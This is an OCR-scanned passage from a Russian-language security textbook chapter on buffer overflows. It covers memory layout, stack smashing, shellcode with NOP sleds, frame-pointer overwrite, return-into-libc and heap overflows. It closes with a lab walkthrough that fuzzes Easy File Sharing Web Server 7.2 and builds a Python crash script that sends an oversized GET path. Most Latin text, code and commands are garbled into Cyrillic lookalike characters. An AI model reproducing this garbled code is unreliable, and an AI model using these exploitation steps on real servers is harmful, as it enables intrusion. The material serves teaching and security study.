После того как к программе подключились необходимые библиотеки, она была 
скомпилирована и запущена, все ее компоненты размещаются в различных сег¬ 
ментах памяти компьютера. 
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4С (высший 
адрес для 
32 бит системы) 


О 


Высшие адреса 

ОхШТГГ 


Низшие адреса 

0x00000000 
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ехес обнуляет данную 
область 


ехес считывает 
из программы 


Рис. 15.1. Структурная схема организации памяти 


Область памяти для программ, написанных на языке С, выглядит следующим об¬ 
разом. 

1. Текстовый сегмент 

Текстовый сегмент, кодовый сегмент или просто текст — одна из частей програм¬ 
мы в памяти компьютера. Она содержит набор исполняемых инструкций. Обыч¬ 
но помечается атрибутом «только для чтения». Текстовый сегмент памяти может 
быть доступен и другим приложениям. Это сделано для того, чтобы не создавать 
множества копий одного и того же часто используемого кода. 

Данный сегмент не является целью атакующего, так как любая попытка за¬ 
писать в него какую-либо информацию приведет к аварийному завершению 
программы. 

В памяти текстовый сегмент может быть расположен ниже или выше областей 
динамически распределяемой памяти (хипа) и стека. 

2. Инициализируемый сегмент данных 

Инициализируемый сегмент данных, или просто сегмент данных, хранит в себе 
блок виртуальных адресных пространств, содержащих глобальные переменные, 
которые задает программист. 
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Данная область памяти может быть перезаписана во время выполнения про¬ 
граммы. Но программист может создавать сегменты, доступные в режиме 
«только для чтения». 

3. Сегмент неинициализированных данных 

Сегмент неинициализированных данных, часто называемый В35 (Ыоск яиігі есі 
Ъу зутЪоІ). Этот сегмент выделяется ядром ОС, и все данные в нем обнуляются 
перед запуском программы. 

4. Стек 

Область стека традиционно граничит с хипом и заполняется в противопо¬ 
ложном направлении. Когда область стека достигает хипа, это означает, что 
свободной памяти не осталось. 

Эта область содержит программный стек типа Ы ГО (Іаяі іп Гігзі оиі) и распо¬ 
лагается в более высоких областях памяти. Это означает, что получить доступ 
можно только к первому элементу в «голове» очереди. В архитектурах х86 
адресация начинается с нуля, в других реализациях адресация может двигаться 
в противоположном направлении. 

В АЛУ существует специальный регистр 5Р (зіаск роііпег), хранящий инфор¬ 
мацию об элементе, который находится в начале, «голове» очереди. 

В стеке хранятся локальные переменные, а также связанная с ними инфор¬ 
мация. 

5. Хип 

Хип — это область динамически распределяемой памяти. Область хип управ¬ 
ляется такими операторами, как та11ос() (тетогу аііосаііоп), геа11ос() и 1гее(). 
Ма11ос() позволяет программисту запрашивать у ОС необходимое количество 
памяти для хранения данных, например область величиной 5000 символов, 
с целью записать туда предоставленный пользователем адрес веб-страницы. 
Одной из особенностей оператора ша11ос() является то, что он может возвра¬ 
щать самый низший из доступных для записи адресов ячейки памяти, а иначе 
откуда бы мы знали, куда заносить данные? Адрес такой ячейки содержится 
в специальной переменной, именуемой указателем (роіпіег). Ргее() — осво¬ 
бождает память и возвращает ОС управление ею. 

Область хип совместно используется различными библиотеками и динамически 
подключаемыми модулями. 

Разбиение стека (ЗтазЫпд Ібе 5І:аск) 

Для того чтобы понять основы разбиения стека, нам необходимо разобраться в том, 
что происходит в случае, когда одна функция вызывает другую. 
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Для примера возьмем часть программы 
ту_і'ипс(рагат 1 , рагат,, рагат п ), 

которая использует локальные переменные ѵаг,, ѵаг 2 .ѵаг т и некоторый набор, 

необходимый для занесения в рагатп,, рагат,,..., рагат п . 

Перед выполнением программы стек будет выглядеть следующим образом: 
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Рис. 15.2. Стек перед вызовом функции 


Указатель стека 5Р будет содержать адрес верхушки стека (У), указатель инструк¬ 
ций ІР будет содержать информацию о следующей инструкции, которая должна 
будет выполняться АЛУ (2). В нашем случае данные указатели подготавливают 
все необходимое для выполнения функции шу_іттс(). 

Как мы уже упоминали выше, стек используется для хранения локальных пере¬ 
менных, но на самом деле он содержит более развернутую информацию. В действи¬ 
тельности в стек помещается весь контекст, необходимый для работы функции, 
включая параметры ее вызова. Вся область памяти, выделенная под выполнение 
функции, называется стековым фреймом. 

Также процессору необходимо каким-то образом ориентироваться в стековом фрей¬ 
ме. Одним из самых разумных способов для этого является выделение фиксиро¬ 
ванного адреса для каждого стекового фрейма. Указатель на этот адрес содержится 
в указателе фрейма — ВР (Ъазе роіпіег или і'гаше роіпгег). 

Вернемся к вызову шуГипс(). Первое, что происходит при вызове, — это передача 
данных для параметров рагат,, рагат,,..., рагат п . Данные будут передаваться в об¬ 
ратном порядке от рагаш п к рагат,. 
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После вызова функции и передачи параметров нам необходимо выполнить саму 
функцию. Для того чтобы это произошло, нам надо добавить в стек адрес инструк¬ 
ции (V), которая должна быть выполнена процессором. 
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Рис. 15.3. Стек после занесения параметров и адреса возврата 

Следующая инструкция, находящаяся по адресу И, является точкой вызова ту_ 
ігтс(). По факту в этой ячейке содержится адрес, взятый из регистра ІР и указы¬ 
вающий на первую инструкцию, которая должна быть выполнена. 

На этом этапе завершается подготовка к исполнению іпу_Іппс(). Но прежде чем 
это произойдет, должны быть соблюдены следующие требования: 

1. Предыдущее значение указателя фрейма (ВР) должно быть сохранено и зане¬ 
сено в стек. Это необходимо для того, чтобы впоследствии мы могли вернуться 
на ту точку, на которой находились до выполнения функции. 
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2. В указатель фрейма (ВР) копируется значение указателя стека (5Р), которое 
указывало на указатель фрейма. 

3. Путем перемещения указателя стека вниз резервируется место для локальных 
переменных ѵаг,, ѵаг„ ..., ѵаг ш . 

Первые два шага выполняются для любых функций одними и теми же инструмен¬ 
тами, машинным кодом или инструкциями. Третий шаг отличается только количе¬ 
ством места, которое необходимо выделить для хранения переменных. 

Эти три шага, являющиеся общими и одинаковыми для вызова любых функций, 
называются прологом (рго1о§) функции. 
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Рис. 15.4. Вид стека после выполнения пролога функции 
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Регистр ІР содержит адрес 5, указывающий на первую «реальную» инструкцию 
функции, которая должна быть выполнена. Регистр В содержит адрес ячейки \Ѵ’, 
данный адрес может быть представлен в виде: адрес \Ѵ минус общая сумма байтов 
в слове. 

Можно заметить, что параметры и локальные переменные функции расположены 
в памяти симметрично, над и под регистром ВР. Как следствие, по отношению к ВР 
адреса параметров будут возрастать, а адреса локальных переменных — умень¬ 
шаться. 

Как вы могли догадаться, поскольку у функции есть пролог, то должен быть и эпи¬ 
лог. Эпилог (ерПод) необходим, чтобы «прибрать за собой» после того, как функция 
выполнит свою работу. 

Это также произойдет в три шага: 

1. Значение регистра \У’, в котором находится копия адреса ВР, будет присвоено 
5Р. Это позволит избавиться от локальных переменных. 

2. Назад в ВР копируется X — сохраненное значение указателя фрейма (выпол¬ 
няется командой «рор», так как ЗР указывает на адрес стека, содержащего нуж¬ 
ное значение). Сравнивая рис. 15.3 и 15.5, а также пренебрегая возможностью 
изменения значений параметров и переменных, можно увидеть, что стек стал 
выглядеть так же, как до выполнения пролога функции. Единственная разница 
в том, что указатель инструкций теперь содержит адрес К. 

3. К указывает на другую «рор» операцию, которая скопирует адрес возврата V 
назад, в указатель инструкции. 

Инструкция по адресу V переместит указатель стека вверх на такое количество 
адресов, на какое оно было увеличено до вызова функции, во время добавления 
в буфер параметров рагат,, рагат 2 , ..., рагат п . Теперь мы получили такое же со¬ 
стояние буфера, показанное на рис. 15.2, как и до вызова функции. 

Пока все выглядит хорошо, так где же возникнет проблема, а вместе с ней и уяз¬ 
вимость? 

Представьте, что одна из вполне обычных и безобидных переменных ѵаг,, ѵаг 2 , ..., 
ѵаг т может оказаться чем угодно, информацией любого типа. По определению 
ячейки буфера расположены в памяти таким образом, что первая из них будет 
иметь наименьший адрес. То есть адреса буфера растут по направлению к наи¬ 
большему адресу. 

Предположим, что программа не проверяет введенную пользователем строку на 
количество символов, а она оказалась больше зарезервированного под нее места 
в памяти. Теперь, если строка не является последним параметром, то вначале из¬ 
лишком символов будут перезаписаны все переменные, находящиеся после нее. 
А затем оставшаяся часть строки перезапишет значения указателя фрейма и адрес 
возврата, на который должен вернуться указатель после выполнения эпилога функ¬ 
ции. Все это открывает для нас интересные возможности! Предположим, что мы 
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подадим на вход программы строку, сформированную таким образом, чтобы она 
переписала адрес возврата на тот, в котором уже находится тщательно сформиро¬ 
ванный вредоносный код. Данный код может находиться там до или после адреса 
возврата. Если сделать все правильно, то после выполнения эпилога функции 
компьютер перейдет по подделанному адресу и выполнит вредоносный код. 


X 


У 


ѵѵ 

ѴѴ’ 


рагат п 


рагат 1 


ѵ 


X 


ВР 


Регистры 

ір 

п 

ЗР 

ѵѵ 

ВР 

X 


ЗР 


Рис. 15.5. Вид стека после шага 2 эпилога функции 


В Цпіх-подобных системах самым популярным видом кода у злоумышленников 
является шелл-код. Шелл в I! п і х — это программная оболочка, которая представ¬ 
ляет собой интерфейс для командной строки. По умолчанию в большинстве систем 
используется командный интерпретатор Борна (Воигпе ЗЬеІІ), находящийся в ди¬ 
ректории /Ьіп/зЬ. Целью сформированного злоумышленником шелл-кода является 
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запуск интерпретатора из директории /Ъіп/зЬ. Это поможет атакующему получить 
доступ к интерфейсу, в котором он сможет выполнять любые команды от имени 
пользователя, запустившего подвергнувшуюся взлому программу. 
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Рис. 15.6. Состояние стека после переполнения буфера 


Примеры такого шелл-кода можно найти в Интернете. Главное его преимуще¬ 
ство — это размер, обычно он содержит не более 60 байт! Это очень важно, так 
как защищает атакующего во время выполнения переполнения буфера от выхода 
сформированного кода за пределы отведенной программе памяти. 

Для атак на ПО, работающее под управлением ОС \Ѵіпс1о\ѵз, также используется 
шелл-код, но под этим подразумевается нечто иное. Одна из проблем при удален- 
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ном переполнении буфера \уіп32 -систем заключается в использовании классиче¬ 
ского метода, когда необходимо заставить машину жертвы скачать файл из сети 
и выполнить его. 

Наверное, это происходит из-за того, что большинство посвященных информа¬ 
ционной безопасности руководств освещает именной такой метод атаки. Однако, 
как показывает практика, шелл-код для \Ѵіпс1о\ѵз может работать по такому же 
принципу, как и для II п і х. 

Даже в случае если ваш шелл-код предоставит вам после удачной атаки доступ 
к командной строке жертвы, имеющей контекст взломанной программы, всегда 
существуют препятствия для выполнения направленной на переполнение буфера 
атаки. 

К таким препятствиям относятся: 

1. Необходимость угадать значение, которое нужно поместить в подделанный 
адрес возврата. 

2. Необходимость угадать местонахождение адреса возврата в стеке (в нашем 
случае \Ѵ). 

3. Необходимость убедиться в том, что шелл-код не содержит нулей, так как это 
приведет к немедленной остановке его выполнения. 

Первая и вторая проблемы обычно встречаются одновременно. Основным спосо¬ 
бом их преодоления является: 

1. Использование N0? (N 0 Орегаі і оп)- и 11 стру к 1 і и й. Такая инструкция не делает 
ничего и ставится перед шелл-кодом. 

2. В сформированном коде, используемом для направленной на переполнение бу¬ 
фера атаки, следует повторять несколько раз предполагаемый начальный адрес. 



Рис. 15.7. Состояние памяти во время направленной на переполнение буфера атаки 
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На рис. 15.7 изображен буфер, в который помещен эксплойт для его переполнения. 
Используя этот подход, мы увеличиваем вероятность того, что начальный адрес 
перезапишет адрес возврата. Более того, теперь нам не обязательно перенаправлять 
выполнение именно на начало шелл-кода, будет достаточно и того, что АЛУ перей¬ 
дет на любую из ИОР-инструкций. Когда АЛУ попадет на ИОР-инструкции, оно 
просто будет пропускать их одну за другой до тех пор, пока не дойдет до шелл-кода 
и не выполнит его. 

Третье условие может быть выполнено заменой нуля на символ с кодом 90Ь, так 
как машинная инструкция с кодом 90 Ь — это N О Р. 

Еще один способ избежать нулевого байта — маскирование части шелл-кода. 
Можно заменить все 0 на 1, а в шелл-код встроить функцию, которая преобразует 
их обратно. 

Также существует возможность написания шелл-кода для х86-архитектуры с ис¬ 
пользованием буквенно-цифровых значений. Если открыть такой код в текстовом 
редакторе, он будет выглядеть как непонятный набор цифр, а также прописных 
и строчных букв. Такой подход дает атакующему большое преимущество, так как 
позволяет избежать обнаружения шелл-кода стандартными средствами защиты. 


Перезапись указателя фрейма 

Как мы уже могли убедиться ранее, возможность осуществления разбиения стека 
появляется вследствие отсутствия или неправильно организованной проверки 
размера данных, находящихся в буфере. И как следствие, максимальный размер 
шелл-кода заранее неизвестен. 

Другой распространенной ошибкой при программировании на языке С является 
так называемая «ой-Ъу-опе еггог», или ошибка на единицу. Чаще всего это проис¬ 
ходит в цикле, выполняющем перебор элементов. Например, перебор элементов 
массива начинается с 1, а не с 0. 

Изначально может создаться ложное впечатление, что ничего плохого из-за одно¬ 
го байта произойти не может, но это не так. На самом деле в данном случае перед 
злоумышленником открываются новые возможности манипуляцией буфером. 

Представим себе ситуацию, в которой первая локальная переменная во фрейме 
стека является буфером, уязвимым к атакам типа «ой-Ъу-опе еггог» во время об¬ 
работки пользовательских данных. В случае, когда между данной переменной 
и указателем фрейма нет других данных (см. рис. 15.4), введенный дополнительный 
байт может переписать один байт сохраненного указателем фрейма (X на рис. 15.4). 

Хорошая новость состоит в том, что из-за сохраненного адреса возврата (V на 
рис. 15.4) у злоумышленника не будет возможности выполнить шелл-код, который 
он мог заранее загрузить в буфер. 

Плохая же новость в том, что для достижения данной цели злоумышленнику при¬ 
дется совершить всего лишь пару дополнительных действий. Для начала отметим, 
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что в архитектуре х86 память организована таким образом, что наиболее важным 
является байт с наименьшим адресом «НШе епбіап». Это означает, что из четырех 
битов, которые составляют слово, первым идет бит, имеющий наименьшую важ¬ 
ность, или имеющий самый низкий адрес. Если провести аналогию с десятичной 
системой, то получится, что числа будут записаны в обратном порядке, например 
1234 будет сохранен таким образом, что 4 будет иметь низший адрес в памяти, 
а 1 — высший. 
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После переполнения буфера 


Рис. 15.8. Перезапись указателя фрейма 


Теперь предположим, что переполнение происходит в функции Ъас1_йтс(), которая 
вызывается функцией §оос1_Гипс(). В ходе атаки злоумышленник сможет изменить 
низший бит — в нашем примере цифру 4 — сохраненного указателя фрейма функ¬ 
ции доо(1_Гппс(). Почему это так важно? Представьте, что порядок битов в памяти 
будет другим, «Ъі§ епбіап». В таком случае любое изменение значения указателя 
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фрейма привело бы к тому, что он указал бы на адрес, который находится вне те¬ 
кущего контекста исполнения программы. Например, 1234 поменялось бы на 3234. 
Но в нашем случае мы меняем низший байт, например 1234 на 1232. И в данном 
случае у злоумышленника есть все шансы поменять адрес указателя фрейма на 
такой, который привел бы к выполнению загруженного шелл-кода. 

Как уже было сказано, указатель фрейма используется для доступа к параметрам 
и локальным переменным функции. Первым результатом изменения указателя 
фрейма функции §оос1_іипс() будет ее работа с неправильными данными и, как 
следствие, возвращение неправильного результата. В лучшем случае после того, как 
функция попытается обратиться к ячейке памяти, находящейся вне допустимого 
ранее выделенного интервала, программа будет экстренно завершена. При худшем 
развитии событий будет достигнут эпилог функции доо(1_Ішіс(). Как говорилось 
ранее, на третьем шаге эпилога будет выполнена команда рор, при помощи которой 
в указатель инструкции будет скопировано значение, находящееся за указателем 
фрейма. 

Итак, единственное, что нужно сделать для выполнения шелл-кода, это изменить 
сохраненное значение указателя фрейма функции §ооб_іипс() на такое, которое 
указывало бы на адресное пространство в области памяти, находящейся на одно 
слово ниже. Где, собственно, и будет находиться начальная часть шелл-кода. 

Атака возврата в библиотеку 

Для рассмотрения атак возврата в библиотеку {англ. КеІигп-іпІо-ІіЬс) вновь об¬ 
ратимся к рис. 15.2, на котором изображен стек перед вызовом шу_1ипс(). Если 
рассмотреть ситуацию с точки зрения вызываемой функции, то сначала стек будет 
содержать адрес возврата, который она должна использовать, а уже затем — параме¬ 
тры. Как мы упоминали в посвященном разбиению стека разделе, основной целью 
атакующего является запуск шелл-кода для получения доступа к системе. Обычно 
подобные шелл-коды используют в ГІпіх-подобных системах такие функции, как 
5у5Іеш() или ехесѵе(), а в системах под управлением ОС ѴѴіпсІоѵѵз — ѴѴіп Ехес(). 
В качестве параметра вызова данные функции используют имя и/или путь про¬ 
граммы. 

Как альтернативу разбиению стека используют прямой вызов определенной функ¬ 
ции. Данный способ имеет одно большое преимущество — его нельзя предотвра¬ 
тить, используя защищенный от исполнения стек. 

Для осуществления такого вида атаки будет достаточно перезаписать адрес воз¬ 
врата адресом функции, которую необходимо вызвать, и заполнить ячейку адреса 
возврата вызываемой функции случайными данными — «заглушкой», а в конце 
задать параметры вызова функции. 

На рис. 15.9 показано состояние буфера и регистров после проведения атаки воз¬ 
врата в библиотеку, после второго шага эпилога. Нормальное состояние стека 
на аналогичном шаге показано на рис. 15.5. Начальный адрес целевой функции 



Атаки, направленные на переполнение буфера 


201 



Регистры 

ір 

Р 

5Р 

ѵѵ 

ВР 

р 


5Р 


Рис. 15.9. Атака возврата в библиотеку 


ІіЫшю(), О, будет занесен в указатель инструкции на третьем шаге эпилога опе¬ 
ратором РОР по адресу К. Если данную ситуацию сравнить с изображенной на 
рис. 15.5, то можно заметить, что параметры для вызова НЫипс() сдвинуты вверх 
на одно слово, — это необходимо для установки «заглушки». Интересно, что под¬ 
дельное значение указателя фрейма Р будет снова занесено в стек после выпол¬ 
нения пролога функции 1іЫипс(). В зависимости от ОС, архитектуры и целевой 
функции процесс нахождения адреса нужной функции может быть затруднен, но, 
безусловно, это вполне выполнимая задача. 


Переполнение динамической области памяти 

Возвращаясь к главе 6, вспомним, что при помощи функции та11ос() программа 
может запрашивать необходимое количество памяти в динамической области 
(Ьеар), а позже, после исполнения, вернуть ОС управление над данной областью 
при помощи функции 1гее(). 

Если вы можете размещать в памяти буфер, следовательно, кто-то сможет этот 
буфер переполнить. Однако выполнение атаки, направленной на переполнение 
буфера, находящегося в динамической области, отличается от таковой при распо¬ 
ложении буфера в стеке. Основное отличие заключается в том, что вы не найдете 
указателя фрейма или адреса возврата, который можно было бы перезаписать, 





















202 Глава 15 • Переполнение буфера 


чтобы затем напрямую обратиться к внедренному злоумышленником коду. Но, 
к сожалению, это не спасает от проведения атак. 

В основе лежит уже знакомый нам метод. Есть недостаточно защищенный буфер, 
в котором не реализована надлежащим образом проверка возможности выхода за 
пределы выделенной памяти. Также имеются используемые ею участки, находящи¬ 
еся за границей выделенной программе области памяти, в которые злоумышленник 
может занести произвольный код. 

Для реализации этого метода нам надо будет работать также с секциями баіа 
и Ьзз. В качестве примера можно привести вектор атаки, при котором злоумыш¬ 
ленник использует переполнение буфера для подмены имени временного файла, 
с которым работает программа. Хранилищем для временных данных может быть 
конфигурационный файл брандмауэра или системы обнаружения атак. В случае 
такой подмены целевой файл будет перезаписан временными данными, и система 
защиты может перестать функционировать вообще. В зависимости от степени за¬ 
щиты целевой системы это может привести к серьезным последствиям. 

Еще одним хорошим примером атаки переполнения буфера может стать метод 
с перезаписью указателя функции. Указатель функции содержит начальный 
адрес функции. Во время описания указателя функции в программе задается тип 
и количество параметров для ее вызова. В некоторых случаях описываются воз¬ 
вращаемые данные. Указатели функций удобны в том случае, когда у вас есть ряд 
выполняющих одинаковые задачи функций, но вы хотите указать конкретную 
функцию для выполнения конкретной задачи во время исполнения программы. 
Например, функции для сортировки, учитывая то, что каждый алгоритм имеет 
свои сильные и слабые стороны. 

Злоумышленника данные параметры не интересуют. Ему важно узнать адрес, со¬ 
держащийся в указателе функции. Он попытается заменить его указывающим на 
начало области памяти, в которой уже находится вредоносный шелл-код. Для по¬ 
вышения вероятности проведения успешной атаки можно использовать методы, 
описанные в разделе, посвященном разбиению стека. 

Пример нахождения уязвимости 
переполнения буфера 

Рассмотрим пример нахождения уязвимости переполнения буфера в аппликации 
Еазу Еііе 5Ьагіп§ ДУеЪ Зегѵег 7.2. Готовый эксплойт можно найти на кир8://хюѵот 
ехрІоіі-(ІЪ.сот/ехрІоіі8/40178/, но мы покажем, как повторить его, начиная с на¬ 
хождения уязвимости и до удаленного выполнения кода. 

Для поиска уязвимости и написания эксплойт-кода нам необходима тестовая среда. 
Для данной демонстрации мы используем две виртуальные машины: 

1. \ѴтсІо\ѵ5 7 32-ЪіІ с установленным 011у<1 Ь§ для анализа работы аппликации 
и написания эксплойт-кода. 
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2. Каіі Ілніх, на которой будет использован МсЕазрІой Ргателѵогк для генерации 
шелл-кода (полезной нагрузки) и выполнения других задач по мере написания 
эксплойт-кода. 

Для более детального ознакомления с темой выполнения атак на переполнение 
буфера рекомендуем начать со страницы «Согеіап Теат: Ехріоіі \ѵгйіп§ іиіогіаіз» 
( НіІр5://ѵі)Ѵ!)тсогеІап.Ъе/іпсІех.ркр/2009/07/19/ехр1оіі-шпіііп&-ШогіаІ-рш1;-1-$іаск- 
Ъазесі-оѵег/іош/). 

Итак, приступим к нахождению уязвимости. 

Обе виртуальные машины находятся в одной локальной сети и имеют адреса: 

Каіі Ьіпих - 192.168.0.200/24 

’Мпсктз 7 (Еазу Гііе 5Ьагіп§ \ѴеЪ Зегѵег) — 192.168.0.80 
Проверим, что аппликация доступна с нашей атакующей машины: 


ЗВ 


® | 192.168.0.80 


▼ С А ЗеагсЬ 


☆ Й ѳ 


|] М05І Ѵііііесі V II СЖеп5Іѵе Бесигііу \.КаІШпих \.КаІі Эос5 Х.КаІі Тооіь НІЕхрІоИ-РВ ^Аігсгаск-пд 



Роѵѵегесі Ьу Еаху Рііе ЗЬаііпдѴѴеЬ Земег 
СоруіідЫ©2012 ЕР5 ЗоЛѵмаге Іпс. 


Рис. 15.10. Веб-интерфейс Еазу Рііе ЗИагіпд ѴѴеЬ Зегѵег 


Рассмотрим НТТР-запрос, отправляемый для запроса данной страницы (можно 
перехватить ѴѴігозІіагк’ом или используя прокси): 

6ЕТ / НТТР/1.1 
НозТ : 192.168.0.80 

ІІ5ег-А§еп1;: Могі11а/5.0 (XII; І_іпих х86_64; гѵ:45.0) Сеско/20100101 РігеТох/45.0 
АссерТ : ГехС/ШтІ,аррІісаТіоп/хШтІ+хтІ,арр1іса1:іоп/хт1;л=0.9,*/*;л=0.8 
Ассер1:-І-ап§иа§е: еп-115,еп;л=0.5 
Ассер1:-ЕпсосІіп§: §гір, сІеТІаТе 
СоппесТіоп: кеер-аііѵе 
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Будем использовать данный запрос для поиска уязвимости переполнения буфера 
путем фаззинга (іп 22 Іп§), или попросту перебора различных значений в различных 
местах данного запроса. 

Данный запрос является стандартным НТТР СЕТ-запросом, в котором можно 
выделить переменные по следующему принципу: 

6ЕТ / НТТР/1.1 
НозТ: 192.168.0.80 

ІІ5ег-А§епТ : М02І11а/5.Ѳ (XII; І_іпих х86_64; гѵ:45.0) беско/20100101 РігеРох/45.0 
Ассері : 1:ех1:/Іі1:т1^арр1іса1:іоп/хШт1+хт1,арр1іса'1:іоп/хт1;р=0.9,*/*;я=0.8 
Ассер1:-Еап§иа@е: еп-ІІ5 л еп;р=0.5 
Ассер1:-ЕпсосІіп§: § 2 Ір, сіе-ріаіе 
Соппесііоп: кеер-аііѵе 

Можно пробовать изменять все параметры запроса, но для начала мы попробуем 
только параметры Раі іі, Нозі и №ег-А§еп1. 

Для фаззинга мы будем использовать Зріке (подробнее об этом можно почитать 
здесь: кіір://ге 8 оигсе 8 .іп/о 8 есіп 8 іііиіе.сот/іпіго-іо-/и 22 Іп^/#^ге/). 

Создадим темплейт, который будем использовать для поиска уязвимости: 

5_5І:гіп§("6ЕТ"); 

5_5ігіпе(" "); 

5_5І;гіп§_ѵагіаЫе("/"); 

5_5‘Ьг’іпе(" "); 

5_5І;гіпё( "НТТР/1.1"); 

5_5І;гіп§("\г\п"); 

5_5І;гіп§("Н05І;: "); 

5_5І;гіп§_ѵагіаЫе (" 192.166.0.80"); 

5_5ігіп§("\г\п"); 

5_5І;гіп§("ІІ5ег-А§еп1;"); 

5_5‘Ьг’іп8(": "); 

5_5І;гіп§_ѵагіаЫе("Мо2І11а/5.0 (XII; І_іпих х86_64; гѵ:45.0) беско/20100101 
РігеГох/45.0"); 

5_5ігіп§("\г\п"); 

5_5І;гіп§( "Ассері"); 

З-ЗІгіпёС': "); 

5_5І:гіп§_ѵагіаЫе("1:ех-|:/Шт1, аррИсаТіоп/хШтІ+хтІ, арріісаііоп/ 
хт1;л=0.9,*/*;ч=0.8"); 

5_5ігіп§("\г\п"); 

5_5І;гіп§( "Ассер1:-1ап§иа§е"); 

5_5І;гіп§(": "); 
з_5І:гіп§("еп-ІІ5,еп;л=0.5"); 

5_5ігіп§("\г\п"); 

5_5І;г1п§( "Ассер1;-ЕпсосІіп§"); 

5_5І;г1п§(": "); 

5_5І;г1п§( "§ 2 Ір, сіе-ріаіе"); 
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З-ЗТгіпёС'ХгЛп"); 

5_5І;гіп§("Соппес1;іоп"); 

5_5Тгіп§(": "); 

5_5І;гіп§( "кеер-аііѵе"); 

5_5І;гіп§("\п\п\г\п"); 

Запустив Зріке, аппликация на первом же параметре выдает ошибку: 

гооі@каіі:~/еа5уТі1е5Ііагіп§меЬ7.2# §епегіс_5епсі_1:ср 192.168.0.110 80 Ыір.зрк 0 0 

Тоіаі ІМшпЬег оТ 5ігіп§5 І5 681 

РІІ22ІП§ 

Ри 22 Іп§ ѴагіаЬІе 0:0 
Ри 22 Іп§ ѴагіаЬІе 0:1 
ѴагіаЫе5іге= 5004 
Ри 22 Іп§ ѴагіаЬІе 0:2 
ѴагіаЫе5іге= 5005 

Перезапустим аппликацию и подключим ОПуОЪ§ к процессу: 


% ОІІуЬЬд - [СРІІ] 

[с] РІІе Ѵіеѵѵ ЬеЬид РІидіпз Орііопг ѴѴІпсІоѵѵ Неір 

+\и] Ч|іі|іі|іі|^|~^Г 


1ШГ 




5еІесІ ргосе$5 Іо айасН 

I Д 1Гв~1Г*~ 












Ѳ0ѲѲ0154 



С: Члі іп і^ома\еуеі:ері32\сеге5. еке 

_ 




00000184 

С5Г5* 


С: \иі і п сіоиіечеу 5* ем32\сегее. еке 




00000324 

Оиін 

ОЫИ Мог іса* іоп ШіпЗоиі 

С: \Ш іпс!оме\еуе^ем32\0иім. еке 





00000660 









Р-5М5 

Ёаеу РІІе ЗЬагіпд ШеЬ Зегѵ 

С:\ЕРЗ ЗоРі;иаге\Еа*у РІІе ЗЬагіпд ЫеЬ Зегѵег\Реиіе.еке 





000001Р0 

Іеае* 


С:іпЗоме\еуеІеп32\Іеаее. еке 





000001Р8 

І5П 


С:іпОоие\еу ьХ ем32\1еп.ек е 





0000Ѳ61 С 



С:\Ргодгап Рі Іее'кІВМ\Моі:ее\песІ. еке 





00000698 

Мни и і 


С: \Ргодгап Р і ІееМВМ^оіееѴіЪпи и і. еке 





00000СВС 

ЗеагсЬРі 


С: \Шіпгіоиіе\еуе*еп32\ЗеагсЬР і ІСегНое*. еке 





00Ѳ0Ѳ8Р8 

ЗеагсЬ Iп 


С: іпгіоие\еуе*ет32\ЗеагсЫпс1екег. еке 





00000С88 

ЗеагсЬРг 


С: \1іі іп0оие\еу5*ем32\ЗеагсЬРго*осо ІНоеі;. еке 





000001Е0 

еегѵісее 


С: \1хі іпсІоиіе\еуесеп32\еегѵ ісее. еке 





00000104 

емее 


\3у е*епРооІ\3у **еп32\епее.еке 





00000560 

5РООІ5Ѵ 


С: \Ш і п с1оие\5у ** ег>і32№роо 1 еѵ. ек е 





0000066С 

ЗІІЗегѵ іс 


С: ''Ргодгап Р і Іее\ІВМ\Мо*ее ч '51І5егс' ісе. еке 





00000258 

еѵсЬоа* 


С: \ІіІ іп8оі*і5\еуеіем32\5ссЬоеі;. еке 





00000204 

5ѴСЬ05* 


С: \Ш іпс!оиіе\еуе^еп32\ессЬое^. еке 





0000032С 

емсЬое* 


С: і п с!оиіе\Зу е* его32\еѵсЬ ое*. ек е 





00000364 

еѵсЬоеІ 


С: іп0оиіе\5уеіет32\еѵсЬо5і;. еке 





00000388 

еѵсЬозі: 


С: \ЦІ іпгіоиі5\еуеіеп32\5ѵсЬо5і. еке 





00000404 

еѵсЬоеІ: 


С: \1х1 іпс!оиіе\еуеі:ет32\еѵсЬое^. еке 





00000434 

еѵсЬое* 


С: ЧіП псІои*\*у ъХ еп32\*ѵсЬ оьХ. еке 















АНасИ | СапсеІ 



Рис. 15.11. Подключение ОІІуОЬд 


Запустив Зріке снова, получаем информацию о состоянии аппликации в момент 
ошибки. Состояние регистров следующее: 



Рис. 15.12. Состояние регистров 
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Исходя из этого и исходя из того, что ошибка появляется на первом же запросе от 
Зріке, 

Ріі 22 Іп§ ѴагіаЬІе 0:1 
ѴагіаЬ1езІ2е= 5004, 

можно сделать вывод, что ошибка вызвана переполнением буфера в переменной 
Раі Іі НТТР СЕТ-запроса с длиной 5000 символов «А». 

Повторим данную ошибку, но уже используя скелетный вариант эксплойт-кода 
(в данном случае написанного на языке РуіЬоп): 

#! /изг/Ьіп/руЬГіоп 
ітрогі 50скеі 
ішрогі 5у5 
ішрогі: 5ігисі 

# зігисі І5 пеесіесі іо сопѵегі Нех асісігезз іо Ьуіе зігіп@ 
ітрогі ііте 

# ііте із пеесіесі Гог ііте.зіеер Гипсііоп 

Но5і='192.168.0.80' 
рогі=80 

ігу: 

з=зоскеі.зоскеі(зоскеі.АР_ІМЕТ,зоскеі.50СК_5ТКЕАМ) 
ехсері: 

ргіпі "зоскеі() Гаііесі" 

5у5.ехіі(1) 

5. соппесі((Нозі,рогі)); 

РАУША0="А" * 5000; 

еѵіі = "6ЕТ " + РАУЮАО + " НТТР/1.1\г\п" 
еѵіі += "Нозі: 192.168.0.80\г\п" 
еѵіі += "ІІ5ег-А§епі: Мо2І11а/5.0\г\п" 
еѵіі += "Соппесііоп: кеер-а1іѵе\г\п" 

еѵіі += "Ассері: іехі/іііті,арріісаііоп/хіііті+хті,арр1ісаііоп/хт1;л=0. 9 , */*;ч=0-8\ 
г\п" 

еѵіі += "Ассері-Еап§иа§е: еп-из,еп;л=0.5\г\п" 
з. зепсі(еѵіі); 
з. сіозе 

Убедимся в том, что ошибка повторяется: 


ЕЯХ 41414141 
ЕСХ РЕЕЕРЕРЕ 
ЕйХ 04ЕЕ5ЕЯС ЯЗСII 
ЕВХ 00Ѳ00001 
ЕЗР 04ЕЕ5Е00 
ЕВР Ѳ4ЕР5Е18 
ЕЗІ 04РЕ5Е84 

ЕйІ 04РР5РЙС ЙЗСІІ 'Чеіес* * ^гоп ъдІ^аЫе мЬеге папе= 
ЕІР 61С277Р6 ъд I И; еЗ. 61С277Р6 


'Чеіес* * *гот вдИаЫе ыЬеге папе='йййййййййййййййййййй 


